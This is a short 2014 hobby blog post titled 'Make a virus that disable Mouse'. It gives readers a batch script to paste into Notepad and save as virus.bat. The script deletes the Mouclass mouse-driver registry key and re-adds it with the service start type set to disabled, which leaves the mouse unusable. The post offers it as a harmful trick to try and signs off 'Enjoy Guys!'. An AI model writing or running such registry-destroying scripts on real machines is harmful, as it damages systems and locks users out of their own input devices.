ComRȁde PyRate

Wednesday 26 November 2014

Make a virus that disable Mouse

how to disable mouse by a virus
Make a virus that disable Mouse
I had previously posted on making different batch files like matrix effect, opening no of web sites with one click which were interesting and completely harmless but today we will be making a batch virus which is harm full it will disable your mouse so think before trying it on yourself.

Read Also :  Basic trick to become a hacker !!!


Open Notepad and copy below codes

     rem ---------------------------------

    rem Disable Mouse

    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

    reg delete %key%

    reg add %key% /v Start /t REG_DWORD /d 4

    rem ---------------------------------

Save this file as  virus.bat

Done you just created your virus.


 Enjoy Guys! and don't forget to post your comments. ©Comrade Pyrate

1 comment: